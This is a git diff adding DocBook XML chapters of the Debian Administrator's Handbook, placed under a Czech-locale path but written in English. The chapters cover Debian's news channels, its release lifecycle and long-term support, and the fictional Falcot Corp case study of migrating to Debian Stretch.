+			For more information about the evolution of Debian and what is happening at some point in time in various teams, there's also the <email>debian-devel-announce@lists.debian.org</email> list. As its name implies, the announcements it carries will probably be more interesting to developers, but it also allows interested parties to keep an eye on what happens in more concrete terms than just when a stable version is released. While <email>debian-announce@lists.debian.org</email> gives news about the user-visible results, <email>debian-devel-announce@lists.debian.org</email> gives news about how these results are produced. As a side note, “d-d-a” (as it is sometimes referred to) is the only list that Debian developers must be subscribed to. <ulink type="block" url="https://lists.debian.org/debian-devel-announce/" />
+		</para>
+		 <para>
+			Debian's official blog (<ulink url="https://bits.debian.org">bits.debian.org</ulink>) is also a good source of information. It conveys most of the interesting news that are published on the various mailing lists that we already covered and other important news contributed by community members. Since all Debian developers can contribute these news when they think they have something noteworthy to make public, Debian's blog gives a valuable insight while staying rather focused on the project as a whole.
+		</para>
+		 <indexterm>
+			<primary>Planet Debian</primary>
+		</indexterm>
+		 <para>
+			A more informal source of information can also be found on Planet Debian, which aggregates articles posted by Debian contributors on their respective blogs. While the contents do not deal exclusively with Debian development, they provide a view into what is happening in the community and what its members are up to. <ulink type="block" url="https://planet.debian.org/" />
+		</para>
+		 <indexterm>
+			<primary>microblog</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>Identi.ca</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>Twitter</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>Facebook</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>Google+</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>social networks</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>network</primary>
+			<secondary>social networks</secondary>
+		</indexterm>
+		 <para>
+			The project is also well represented on social networks. While Debian only has an official presence on platforms built with free software (like the Identi.ca microblogging platform, powered by <emphasis>pump.io</emphasis>), there are many Debian contributors who are animating Twitter accounts, Facebook pages, Google+ pages, and more. <ulink type="block" url="https://identi.ca/debian" /> <ulink type="block" url="https://twitter.com/debian" /> <ulink type="block" url="https://www.facebook.com/debian" /> <ulink type="block" url="https://plus.google.com/111711190057359692089" />
+		</para>
+
+	</section>
+	 <section id="sect.role-of-distributions">
+		<title>The Role of Distributions</title>
+		 <indexterm>
+			<primary>Linux distribution</primary>
+			<secondary>role</secondary>
+		</indexterm>
+		 <para>
+			A GNU/Linux distribution has two main objectives: install a free operating system on a computer (either with or without an existing system or systems), and provide a range of software covering all of the users' needs.
+		</para>
+		 <section>
+			<title>The Installer: <command>debian-installer</command></title>
+			 <para>
+				The <command>debian-installer</command>, designed to be extremely modular in order to be as generic as possible, targets the first objective. It covers a broad range of installation situations and in general, greatly facilitates the creation of a derivative installer corresponding to a particular case.
+			</para>
+			 <para>
+				This modularity, which also makes it very complex, may be daunting for the developers discovering this tool; but whether used in graphical or text mode, the user's experience is still similar. Great efforts have been made to reduce the number of questions asked at installation time, in particular thanks to the inclusion of automatic hardware detection software.
+			</para>
+			 <para>
+				It is interesting to note that distributions derived from Debian differ greatly on this aspect, and provide a more limited installer (often confined to the i386 or amd64 architectures), but more user-friendly for the uninitiated. On the other hand, they usually refrain from straying too far from package contents in order to benefit as much as possible from the vast range of software offered without causing compatibility problems.
+			</para>
+
+		</section>
+		 <section>
+			<title>The Software Library</title>
+			 <para>
+				Quantitatively, Debian is undeniably the leader in this respect, with over 25,000 source packages. Qualitatively, Debian’s policy and long testing period prior to releasing a new stable version justify its reputation for stability and consistency. As far as availability, everything is available on-line through many mirrors worldwide, with updates pushed out every six hours.
+			</para>
+			 <para>
+				Many retailers sell DVD-ROMs on the Internet at a very low price (often at cost), the “images” for which are freely available for download. There is only one drawback: the low frequency of releases of new stable versions (their development sometimes takes more than two years), which delays the inclusion of new software.
+			</para>
+			 <para>
+				Most new free software programs quickly find their way into the development version which allows them to be installed. If this requires too many updates due to their dependencies, the program can also be recompiled for the stable version of Debian (see <xref linkend="debian-packaging" /> for more information on this topic).
+			</para>
+
+		</section>
+
+	</section>
+	 <section id="sect.release-lifecycle">
+		<title>Lifecycle of a Release</title>
+		 <indexterm>
+			<primary>lifecycle</primary>
+		</indexterm>
+		 <indexterm>
+			<primary><emphasis role="distribution">Unstable</emphasis></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><emphasis role="distribution">Testing</emphasis></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><emphasis role="distribution">Stable</emphasis></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><emphasis role="distribution">Experimental</emphasis></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><emphasis role="distribution">Oldstable</emphasis></primary>
+		</indexterm>
+		 <indexterm>
+			<primary><emphasis role="distribution">Oldoldstable</emphasis></primary>
+		</indexterm>
+		 <para>
+			The project will simultaneously have three to six different versions of each program, named <emphasis role="distribution">Experimental</emphasis>, <emphasis role="distribution">Unstable</emphasis>, <emphasis role="distribution">Testing</emphasis>, <emphasis role="distribution">Stable</emphasis>, <emphasis role="distribution">Oldstable</emphasis>, and even <emphasis role="distribution">Oldoldstable</emphasis>. Each one corresponds to a different phase in development. For a good understanding, let us take a look at a program's journey, from its initial packaging to inclusion in a stable version of Debian.
+		</para>
+		 <sidebar> <title><emphasis>VOCABULARY</emphasis> Release</title>
+		 <indexterm>
+			<primary>release</primary>
+		</indexterm>
+		 <para>
+			The term “release”, in the Debian project, indicates a particular version of a distribution (e.g., “unstable release” means “the unstable version”). It also indicates the public announcement of the launch of any new version (stable).
+		</para>
+		 </sidebar> <section>
+			<title>The <emphasis role="distribution">Experimental</emphasis> Status</title>
+			 <para>
+				First let us take a look at the particular case of the <emphasis role="distribution">Experimental</emphasis> distribution: this is a group of Debian packages corresponding to the software currently in development, and not necessarily completed, explaining its name. Not everything passes through this step; some developers add packages here in order to get feedback from more experienced (or braver) users.
+			</para>
+			 <para>
+				Otherwise, this distribution frequently houses important modifications to base packages, whose integration into <emphasis role="distribution">Unstable</emphasis> with serious bugs would have critical repercussions. It is, thus, a completely isolated distribution, its packages never migrate to another version (except by direct, express intervention of the maintainer or the ftpmasters). It is also not self-contained: only a subset of the existing packages are present in <emphasis role="distribution">Experimental</emphasis>, and it generally does not include the base system. This distribution is therefore mostly useful in combination with another, self-contained, distribution such as <emphasis role="distribution">Unstable</emphasis>.
+			</para>
+
+		</section>
+		 <section>
+			<title>The <emphasis role="distribution">Unstable</emphasis> Status</title>
+			 <para>
+				Let us turn back to the case of a typical package. The maintainer creates an initial package, which they compile for the <emphasis role="distribution">Unstable</emphasis> version and place on the <literal>ftp-master.debian.org</literal> server. This first event involves inspection and validation from the ftpmasters. The software is then available in the <emphasis role="distribution">Unstable</emphasis> distribution, which is the “cutting edge” distribution chosen by users who are more concerned with having up to date packages than worried about serious bugs. They discover the program and then test it.
+			</para>
+			 <para>
+				If they encounter bugs, they report them to the package's maintainer. The maintainer then regularly prepares corrected versions, which they upload to the server.
+			</para>
+			 <para>
+				Every newly updated package is updated on all Debian mirrors around the world within six hours. The users then test the corrections and search for other problems resulting from the modifications. Several updates may then occur rapidly. During these times, autobuilder robots come into action. Most frequently, the maintainer has only one traditional PC and has compiled their package on the amd64 (or i386) architecture (or they opted for a source-only upload, thus without any precompiled package); the autobuilders take over and automatically compile versions for all the other architectures. Some compilations may fail; the maintainer will then receive a bug report indicating the problem, which is then to be corrected in the next versions. When the bug is discovered by a specialist for the architecture in question, the bug report may come with a patch ready to use.
+			</para>
+			 <indexterm>
+				<primary>autobuilder</primary>
+			</indexterm>
+			 <figure>
+				<title>Compilation of a package by the autobuilders</title>
+				 <mediaobject>
+					<imageobject>
+						<imagedata fileref="images/autobuilder.png" format="PNG" scalefit="1" width="75%" />
+					</imageobject>
+
+				</mediaobject>
+
+			</figure>
+			 <sidebar> <title><emphasis>QUICK LOOK</emphasis> <command>buildd</command>, the Debian package recompiler</title>
+			 <indexterm>
+				<primary><command>buildd</command></primary>
+			</indexterm>
+			 <indexterm>
+				<primary>build daemon</primary>
+			</indexterm>
+			 <para>
+				<emphasis>buildd</emphasis> is the abbreviation of “build daemon”. This program automatically recompiles new versions of Debian packages on the architectures on which it is hosted (cross-compilation is avoided as much as possible).
+			</para>
+			 <para>
+				Thus, to produce binaries for the <literal>arm64</literal> architecture, the project has <literal>arm64</literal> machines available. The <emphasis>buildd</emphasis> program runs on them continuously and creates binary packages for <literal>arm64</literal> from source packages sent by Debian developers.
+			</para>
+			 <para>
+				This software is used on all the computers serving as autobuilders for Debian. By extension, the term <emphasis>buildd</emphasis> frequently is used to refer to these machines, which are generally reserved solely for this purpose.
+			</para>
+			 </sidebar>
+		</section>
+		 <section>
+			<title>Migration to <emphasis role="distribution">Testing</emphasis></title>
+			 <para>
+				A bit later, the package will have matured; compiled on all the architectures, it will not have undergone recent modifications. It is then a candidate for inclusion in the <emphasis role="distribution">Testing</emphasis> distribution — a group of <emphasis role="distribution">Unstable</emphasis> packages chosen according to some quantifiable criteria. Every day a program automatically selects the packages to include in <emphasis role="distribution">Testing</emphasis>, according to elements guaranteeing a certain level of quality:
+			</para>
+			 <orderedlist>
+				<listitem>
+					<para>
+						lack of critical bugs, or, at least fewer than the version currently included in <emphasis role="distribution">Testing</emphasis>;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						at least 10 days spent in <emphasis role="distribution">Unstable</emphasis>, which is sufficient time to find and report any serious problems;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						successful compilation on all officially supported architectures;
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						dependencies that can be satisfied in <emphasis role="distribution">Testing</emphasis>, or that can at least be moved there together with the package in question.
+					</para>
+
+				</listitem>
+
+			</orderedlist>
+			 <para>
+				This system is clearly not infallible; critical bugs are regularly found in packages included in <emphasis role="distribution">Testing</emphasis>. Still, it is generally effective, and <emphasis role="distribution">Testing</emphasis> poses far fewer problems than <emphasis role="distribution">Unstable</emphasis>, being for many, a good compromise between stability and novelty.
+			</para>
+			 <sidebar> <title><emphasis>NOTE</emphasis> Limitations of <emphasis role="distribution">Testing</emphasis></title>
+			 <para>
+				While very interesting in principle, <emphasis role="distribution">Testing</emphasis> does have some practical problems: the tangle of cross-dependencies between packages is such that a package can rarely move there completely on its own. With packages all depending upon each other, it is sometimes necessary to migrate a large number of packages simultaneously, which is impossible when some are uploading updates regularly. On the other hand, the script identifying the families of related packages works hard to create them (this would be an NP-complete problem, for which, fortunately, we know some good heuristics). This is why we can manually interact with and guide this script by suggesting groups of packages, or imposing the inclusion of certain packages in a group, even if this temporarily breaks some dependencies. This functionality is accessible to the Release Managers and their assistants.
+			</para>
+			 <para>
+				Recall that an NP-complete problem is of an exponential algorithmic complexity according to the size of the data, here being the length of the code (the number of figures) and the elements involved. The only way to resolve it is frequently to examine all possible configurations, which could require enormous means. A heuristic is an approximate, but satisfying, solution.
+			</para>
+			 </sidebar> <sidebar> <title><emphasis>COMMUNITY</emphasis> The Release Manager</title>
+			 <indexterm>
+				<primary>Release Manager</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>Stable Release Manager</primary>
+			</indexterm>
+			 <para>
+				Release Manager is an important title, associated with heavy responsibilities. The bearer of this title must, in effect, manage the release of a new, stable version of Debian, and define the process for development of <emphasis role="distribution">Testing</emphasis> until it meets the quality criteria for <emphasis role="distribution">Stable</emphasis>. They also define a tentative schedule (not always followed).
+			</para>
+			 <para>
+				We also have Stable Release Managers, often abbreviated SRM, who manage and select updates for the current stable version of Debian. They systematically include security patches and examine all other proposals for inclusion, on a case by case basis, sent by Debian developers eager to update their package in the stable version.
+			</para>
+			 </sidebar>
+		</section>
+		 <section>
+			<title>The Promotion from <emphasis role="distribution">Testing</emphasis> to <emphasis role="distribution">Stable</emphasis></title>
+			 <para>
+				Let us suppose that our package is now included in <emphasis role="distribution">Testing</emphasis>. As long as it has room for improvement, its maintainer must continue to improve it and restart the process from <emphasis role="distribution">Unstable</emphasis> (but its later inclusion in <emphasis role="distribution">Testing</emphasis> is generally faster: unless it changed significantly, all of its dependencies are already available). When it reaches perfection, the maintainer has completed their work. The next step is the inclusion in the <emphasis role="distribution">Stable</emphasis> distribution, which is, in reality, a simple copy of <emphasis role="distribution">Testing</emphasis> at a moment chosen by the Release Manager. Ideally this decision is made when the installer is ready, and when no program in <emphasis role="distribution">Testing</emphasis> has any known critical bugs.
+			</para>
+			 <para>
+				Since this moment never truly arrives, in practice, Debian must compromise: remove packages whose maintainer has failed to correct bugs on time, or agree to release a distribution with some bugs in the thousands of programs. The Release Manager will have previously announced a freeze period, during which each update to <emphasis role="distribution">Testing</emphasis> must be approved. The goal here is to prevent any new version (and its new bugs), and to only approve updates fixing bugs.
+			</para>
+			 <figure>
+				<title>A package's path through the various Debian versions</title>
+				 <mediaobject>
+					<imageobject>
+						<imagedata fileref="images/release-cycle.png" format="PNG" width="60%" />
+					</imageobject>
+
+				</mediaobject>
+
+			</figure>
+			 <sidebar> <title><emphasis>VOCABULARY</emphasis> Freeze: the home straight</title>
+			 <indexterm>
+				<primary>freeze</primary>
+			</indexterm>
+			 <para>
+				During the freeze period, development of the <emphasis role="distribution">Testing</emphasis> distribution is blocked; no more automatic updates are allowed. Only the Release Managers are then authorized to change packages, according to their own criteria. The purpose is to prevent the appearance of new bugs by introducing new versions; only thoroughly examined updates are authorized when they correct significant bugs.
+			</para>
+			 </sidebar> <para>
+				After the release of a new stable version, the Stable Release Managers manage all further development (called “revisions”, ex: 7.1, 7.2, 7.3 for version 7). These updates systematically include all security patches. They will also include the most important corrections (the maintainer of a package must prove the gravity of the problem that they wish to correct in order to have their updates included).
+			</para>
+			 <para>
+				At the end of the journey, our hypothetical package is now included in the stable distribution. This journey, not without its difficulties, explains the significant delays separating the Debian Stable releases. This contributes, over all, to its reputation for quality. Furthermore, the majority of users are satisfied using one of the three distributions simultaneously available. The system administrators, concerned above all about the stability of their servers, don't need the latest and greatest version of GNOME; they can choose Debian <emphasis role="distribution">Stable</emphasis>, and they will be satisfied. End users, more interested in the latest versions of GNOME or KDE Plasma than in rock-solid stability, will find Debian <emphasis role="distribution">Testing</emphasis> to be a good compromise between a lack of serious problems and relatively up to date software. Finally, developers and more experienced users may blaze the trail, testing all the latest developments in Debian <emphasis role="distribution">Unstable</emphasis> right out of the gate, at the risk of suffering the headaches and bugs inherent in any new version of a program. To each their own Debian!
+			</para>
+			 <sidebar> <title><emphasis>CULTURE</emphasis> GNOME and KDE Plasma, graphical desktop environments</title>
+			 <para>
+				GNOME (GNU Network Object Model Environment) and Plasma by KDE are the two most popular graphical desktop environments in the free software world. A desktop environment is a set of programs grouped together to allow easy management of the most common operations through a graphical interface. They generally include a file manager, office suite, web browser, e-mail program, multimedia accessories, etc. The most visible difference resides in the choice of the graphical library used: GNOME has chosen GTK+ (free software licensed under the LGPL), and the KDE community has selected Qt (a company-backed project, available nowadays both under the GPL and a commercial license). <ulink type="block" url="https://www.gnome.org/" /> <ulink type="block" url="https://www.kde.org/" />
+			</para>
+			 </sidebar> <figure>
+				<title>Chronological path of a program packaged by Debian</title>
+				 <mediaobject>
+					<imageobject>
+						<imagedata fileref="images/package-lifecycle.png" format="PNG" scalefit="1" />
+					</imageobject>
+
+				</mediaobject>
+
+			</figure>
+
+		</section>
+		 <section>
+			<title>The <emphasis role="distribution">Oldstable</emphasis> and <emphasis role="distribution">Oldoldstable</emphasis> Status</title>
+			 <indexterm>
+				<primary>Long Term Support (LTS)</primary>
+			</indexterm>
+			 <indexterm>
+				<primary>support</primary>
+				<secondary>Long Term Support (LTS)</secondary>
+			</indexterm>
+			 <para>
+				Each <emphasis role="distribution">Stable</emphasis> release has an expected lifetime of about 5 years and given that releases tend to happen every 2 years, there can be up to 3 supported releases at a given point of time. When a new stable release happens, the former release becomes <emphasis role="distribution">Oldstable</emphasis> and the one even before becomes <emphasis role="distribution">Oldoldstable</emphasis>.
+			</para>
+			 <para>
+				This Long Term Support (LTS) of Debian releases is a recent initiative: individual contributors and companies joined forces to create the Debian LTS team. Older releases which are no longer supported by the Debian security team fall under the responsibility of this new team.
+			</para>
+			 <para>
+				The Debian security team handles security support in the current <emphasis role="distribution">Stable</emphasis> release and also in the <emphasis role="distribution">Oldstable</emphasis> release (but only for as long as is needed to ensure one year of overlap with the current stable release). This amounts roughly to three years of support for each release. The Debian LTS team handles the last (two) years of security support so that each releases benefits from at least 5 years of support and so that users can upgrade from version N to N+2. <ulink type="block" url="https://wiki.debian.org/LTS" />
+			</para>
+			 <sidebar> <title><emphasis>COMMUNITY</emphasis> Companies sponsoring the LTS effort</title>
+			 <para>
+				Long Term Support is a difficult commitment to make in Debian because volunteers tend to avoid the work that is not very fun. And providing security support for 5 years old software is — for many contributors — a lot less fun than packaging new upstream versions or developing new features.
+			</para>
+			 <para>
+				To bring this project to life, the project counted on the fact that long term support was particularly relevant for companies and that they would be willing to mutualize the cost of this security support.
+			</para>
+			 <para>
+				The project started in June 2014: some organizations allowed their employees to contribute part-time to Debian LTS while others preferred to sponsor the project with money so that Debian contributors get paid to do the work that they would not do for free. Most Debian contributors willing to be paid to work on LTS got together to create a clear sponsorship offer managed by Freexian (Raphaël Hertzog's company): <ulink type="block" url="https://www.freexian.com/services/debian-lts.html" />
+			</para>
+			 <para>
+				In the Debian LTS team, the volunteers work on packages they care about while the paid contributors prioritize packages used by their sponsors.
+			</para>
+			 <para>
+				The project is always looking for new sponsors: What about your company? Can you let an employee work part-time on long term support? Can you allocate a small budget for security support? <ulink type="block" url="https://wiki.debian.org/LTS/Funding" />
+			</para>
+			 </sidebar>
+		</section>
+
+	</section>
+</chapter>
+
diff --git a/tmp/cs-CZ/xml/02_case-study.xml b/tmp/cs-CZ/xml/02_case-study.xml
new file mode 100644
index 000000000..4e8577f4a
--- /dev/null
+++ b/tmp/cs-CZ/xml/02_case-study.xml
@@ -0,0 +1,240 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<chapter id="case-study" lang="cs-CZ">
+	<chapterinfo>
+		 <keywordset>
+			<keyword>Falcot Corp</keyword>
+			 <keyword>SMB</keyword>
+			 <keyword>Strong Growth</keyword>
+			 <keyword>Master Plan</keyword>
+			 <keyword>Migration</keyword>
+			 <keyword>Cost Reduction</keyword>
+
+		</keywordset>
+
+	</chapterinfo>
+	 <title>Presenting the Case Study</title>
+	 <highlights> <para>
+		In the context of this book, you are the system administrator of a growing small business. The time has come for you to redefine the information systems master plan for the coming year in collaboration with your directors. You choose to progressively migrate to Debian, both for practical and economical reasons. Let's see in more detail what's in store for you…
+	</para>
+	 </highlights> <para>
+		We have envisioned this case study to approach all modern information system services currently used in a medium sized company. After reading this book, you will have all of the elements necessary to install Debian on your servers and fly on your own wings. You will also learn how to efficiently find information in the event of difficulties.
+	</para>
+	 <section id="sect.fast-growing-it-needs">
+		<title>Fast Growing IT Needs</title>
+		 <para>
+			Falcot Corp is a manufacturer of high quality audio equipment. The company is growing strongly, and has two facilities, one in Saint-Étienne, and another in Montpellier. The former has around 150 employees; it hosts a factory for the manufacturing of speakers, a design lab, and all administrative office. The Montpellier site is smaller, with only about 50 workers, and produces amplifiers.
+		</para>
+		 <sidebar> <title><emphasis>NOTE</emphasis> Fictional company created for case study</title>
+		 <para>
+			The Falcot Corp company used as an example here is completely fictional. Any resemblance to an existing company is purely coincidental. Likewise, some example data throughout this book may be fictional.
+		</para>
+		 </sidebar> <para>
+			The information system has had difficulty keeping up with the company's growth, so they are now determined to completely redefine it to meet various goals established by management:
+		</para>
+		 <itemizedlist>
+			<listitem>
+				<para>
+					modern, easily scalable infrastructure;
+				</para>
+
+			</listitem>
+			 <listitem>
+				<para>
+					reducing cost of software licenses thanks to use of Open Source software;
+				</para>
+
+			</listitem>
+			 <listitem>
+				<para>
+					installation of an e-commerce website, possibly B2B (business to business, i.e. linking of information systems between different companies, such as a supplier and its clients);
+				</para>
+
+			</listitem>
+			 <listitem>
+				<para>
+					significant improvement in security to better protect trade secrets related to new products.
+				</para>
+
+			</listitem>
+
+		</itemizedlist>
+		 <para>
+			The entire information system will be overhauled with these goals in mind.
+		</para>
+
+	</section>
+	 <section id="sect.master-plan">
+		<title>Master Plan</title>
+		 <indexterm>
+			<primary>master plan</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>migration</primary>
+		</indexterm>
+		 <para>
+			With your collaboration, IT management has conducted a slightly more extensive study, identifying some constraints and defining a plan for migration to the chosen Open Source system, Debian.
+		</para>
+		 <para>
+			A significant constraint identified is that the accounting department uses specific software, which only runs on <trademark>Microsoft Windows</trademark>. The laboratory, for its part, uses computer aided design software that runs on <trademark>OS X</trademark>.
+		</para>
+		 <figure>
+			<title>Overview of the Falcot Corp network</title>
+			 <mediaobject>
+				<imageobject>
+					<imagedata fileref="images/case-study.png" format="PNG" scalefit="1" width="75%" />
+				</imageobject>
+
+			</mediaobject>
+
+		</figure>
+		 <para>
+			The switch to Debian will be gradual; a small business, with limited means, cannot reasonably change everything overnight. For starters, the IT staff must be trained in Debian administration. The servers will then be converted, starting with the network infrastructure (routers, firewalls, etc.) followed by the user services (file sharing, Web, SMTP, etc.). Then the office computers will be gradually migrated to Debian, for each department to be trained (internally) during the deployment of the new system.
+		</para>
+
+	</section>
+	 <section id="sect.why-gnu-linux">
+		<title>Why a GNU/Linux Distribution?</title>
+		 <sidebar> <title><emphasis>BACK TO BASICS</emphasis> Linux or GNU/Linux?</title>
+		 <indexterm>
+			<primary>GNU/Linux</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>Linux</primary>
+		</indexterm>
+		 <para>
+			Linux, as you already know, is only a kernel. The expressions, “Linux distribution” and “Linux system” are, thus, incorrect: they are, in reality, distributions or systems <emphasis>based on</emphasis> Linux. These expressions fail to mention the software that always completes this kernel, among which are the programs developed by the GNU Project. Dr. Richard Stallman, founder of this project, insists that the expression “GNU/Linux” be systematically used, in order to better recognize the important contributions made by the GNU Project and the principles of freedom upon which they are founded.
+		</para>
+		 <para>
+			Debian has chosen to follow this recommendation, and, thus, name its distributions accordingly (thus, the latest stable release is Debian GNU/Linux 9).
+		</para>
+		 </sidebar> <para>
+			Several factors have dictated this choice. The system administrator, who was familiar with this distribution, ensured it was listed among the candidates for the computer system overhaul. Difficult economic conditions and ferocious competition have limited the budget for this operation, despite its critical importance for the future of the company. This is why Open Source solutions were swiftly chosen: several recent studies indicate they are less expensive than proprietary solutions while providing equal or better quality of service so long as qualified personnel are available to run them.
+		</para>
+		 <sidebar> <title><emphasis>IN PRACTICE</emphasis> Total cost of ownership (TCO)</title>
+		 <indexterm>
+			<primary>TCO</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>Total Cost of Ownership</primary>
+		</indexterm>
+		 <para>
+			The Total Cost of Ownership is the total of all money expended for the possession or acquisition of an item, in this case referring to the operating system. This price includes any possible license fee, costs for training personnel to work with the new software, replacement of machines that are too slow, additional repairs, etc. Everything arising directly from the initial choice is taken into account.
+		</para>
+		 <para>
+			This TCO, which varies according to the criteria chosen in the assessment thereof, is rarely significant when taken in isolation. However, it is very interesting to compare TCOs for different options if they are calculated according to the same rules. This assessment table is, thus, of paramount importance, and it is easy to manipulate it in order to draw a predefined conclusion. Thus, the TCO for a single machine doesn't make sense, since the cost of an administrator is also reflected in the total number of machines they manage, a number which obviously depends on the operating system and tools proposed.
+		</para>
+		 </sidebar> <para>
+			Among free operating systems, the IT department looked at the free BSD systems (OpenBSD, FreeBSD, and NetBSD), GNU Hurd, and Linux distributions. GNU Hurd, which has not yet released a stable version, was immediately rejected. The choice is simpler between BSD and Linux. The former have many merits, especially on servers. Pragmatism, however, led to choosing a Linux system, since its installed base and popularity are both very significant and have many positive consequences. One of these consequences is that it is easier to find qualified personnel to administer Linux machines than technicians experienced with BSD. Furthermore, Linux adapts to newer hardware faster than BSD (although they are often neck and neck in this race). Finally, Linux distributions are often more adapted to user-friendly graphical user interfaces, indispensable for beginners during migration of all office machines to a new system.
+		</para>
+		 <sidebar> <title><emphasis>ALTERNATIVE</emphasis> Debian GNU/kFreeBSD</title>
+		 <indexterm>
+			<primary>kFreeBSD</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>FreeBSD</primary>
+		</indexterm>
+		 <indexterm>
+			<primary>BSD</primary>
+		</indexterm>
+		 <para>
+			Since Debian 6 <emphasis role="distribution">Squeeze</emphasis>, it is possible to use Debian with a FreeBSD kernel on 32 and 64 bit computers; this is what the <literal>kfreebsd-i386</literal> and <literal>kfreebsd-amd64</literal> architectures mean. While these architectures are not “official release architectures”, about 90 % of the software packaged by Debian is available for them.
+		</para>
+		 <para>
+			These architectures may be an appropriate choice for Falcot Corp administrators, especially for a firewall (the kernel supports three different firewalls: IPF, IPFW, PF) or for a NAS (network attached storage system, for which the ZFS filesystem has been tested and approved).
+		</para>
+		 </sidebar>
+	</section>
+	 <section id="sect.why-debian">
+		<title>Why the Debian Distribution?</title>
+		 <para>
+			Once the Linux family has been selected, a more specific option must be chosen. Again, there are plenty of criteria to consider. The chosen distribution must be able to operate for several years, since the migration from one to another would entail additional costs (although less than if the migration were between two totally different operating systems, such as Windows or OS X).
+		</para>
+		 <para>
+			Sustainability is, thus, essential, and it must guarantee regular updates and security patches over several years. The timing of updates is also significant, since, with so many machines to manage, Falcot Corp can not handle this complex operation too frequently. The IT department, therefore, insists on running the latest stable version of the distribution, benefiting from the best technical assistance, and guaranteed security patches. In effect, security updates are generally only guaranteed for a limited duration on older versions of a distribution.
+		</para>
+		 <para>
+			Finally, for reasons of homogeneity and ease of administration, the same distribution must run on all the servers and office computers.
+		</para>
+		 <section>
+			<title>Commercial and Community Driven Distributions</title>
+			 <para>
+				There are two main categories of Linux distributions: commercial and community driven. The former, developed by companies, are sold with commercial support services. The latter are developed according to the same open development model as the free software of which they are comprised.
+			</para>
+			 <para>
+				A commercial distribution will have, thus, a tendency to release new versions more frequently, in order to better market updates and associated services. Their future is directly connected to the commercial success of their company, and many have already disappeared (Caldera Linux, StormLinux, Mandriva Linux, etc.).
+			</para>
+			 <para>
+				A community distribution doesn't follow any schedule but its own. Like the Linux kernel, new versions are released when they are stable, never before. Its survival is guaranteed, as long as it has enough individual developers or third party companies to support it.
+			</para>
+			 <indexterm>
+				<primary>distribution</primary>
+				<secondary>community Linux distribution</secondary>
+			</indexterm>
+			 <indexterm>
+				<primary>distribution</primary>
+				<secondary>commercial Linux distribution</secondary>
+			</indexterm>
+			 <para>
+				A comparison of various Linux distributions led to the choice of Debian for various reasons:
+			</para>
+			 <itemizedlist>
+				<listitem>
+					<para>
+						It is a community distribution, with development ensured independently from any commercial constraints; its objectives are, thus, essentially of a technical nature, which seem to favor the overall quality of the product.
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						Of all community distributions, it is the most significant from many perspectives: in number of contributors, number of software packages available, and years of continuous existence. The size of its community is an incontestable witness to its continuity.
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						Statistically, new versions are released every 18 to 24 months, and they are supported for 5 years, a schedule which is agreeable to administrators.
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						A survey of several French service companies specialized in free software has shown that all of them provide technical assistance for Debian; it is also, for many of them, their chosen distribution, internally. This diversity of potential providers is a major asset for Falcot Corp's independence.
+					</para>
+
+				</listitem>
+				 <listitem>
+					<para>
+						Finally, Debian is available on a multitude of architectures, including ppc64el for OpenPOWER processors; it will, thus, be possible to install it on Falcot Corp's latest IBM servers.
+					</para>
+
+				</listitem>
+
+			</itemizedlist>
+			 <sidebar> <title><emphasis>IN PRACTICE</emphasis> Debian Long Term Support</title>
+			 <para>
+				The Debian Long Term Support (LTS) project started in 2014 and aims to provide 5 years of security support to all stable Debian releases. As LTS is of primary importance to organizations with large deployments, the project tries to pool resources from Debian-using companies. <ulink type="block" url="https://wiki.debian.org/LTS" />
+			</para>
+			 <para>
+				Falcot Corp is not big enough to let one member of its IT staff contribute to the LTS project, so the company opted to subscribe to Freexian's Debian LTS contract and provides financial support. Thanks to this, the Falcot administrators know that the packages they use will be handled in priority and they have a direct contact with the LTS team in case of problems. <ulink type="block" url="https://wiki.debian.org/LTS/Funding" /> <ulink type="block" url="https://www.freexian.com/services/debian-lts.html" />
+			</para>
+			 </sidebar> <para>
+				Once Debian has been chosen, the matter of which version to use must be decided. Let us see why the administrators have picked Debian Stretch.
+			</para>
+
+		</section>
+
+	</section>
+	 <section id="sect.why-debian-stable">
+		<title>Why Debian Stretch?</title>
+		 <para>
+			Every Debian release starts its life as a continuously changing distribution, also known as “<emphasis role="distribution">Testing</emphasis>”. But at the time we write those lines, Debian Stretch is the latest “<emphasis role="distribution">Stable</emphasis>” version of Debian.
+		</para>
+		 <para>
+			The choice of Debian Stretch is well justified based on the fact that any administrator concerned about the quality of their servers will naturally gravitate towards the stable version of Debian. Even if the previous stable release might still be supported for a while, Falcot administrators aren't considering it because its support period will not last long enough and because the latest version brings new interesting features that they care about.
+		</para>
+
+	</section>
+</chapter>
+
diff --git a/tmp/cs-CZ/xml/03_existing-setup.xml b/tmp/cs-CZ/xml/03_existing-setup.xml
new file mode 100644
index 000000000..50c55b59b
--- /dev/null
+++ b/tmp/cs-CZ/xml/03_existing-setup.xml
@@ -0,0 +1,354 @@
+<?xml version='1.0' encoding='utf-8' ?>
+<!DOCTYPE chapter PUBLIC "-//OASIS//DTD DocBook XML V4.5//EN" "http://www.oasis-open.org/docbook/xml/4.5/docbookx.dtd" [
+]>
+<chapter id="existing-setup" lang="cs-CZ">
+	<chapterinfo>
+		 <keywordset>
+			<keyword>Existing Setup</keyword>
+			 <keyword>Reuse</keyword>
+			 <keyword>Migration</keyword>
+
+		</keywordset>
+
+	</chapterinfo>
+	 <title>Analyzing the Existing Setup and Migrating</title>
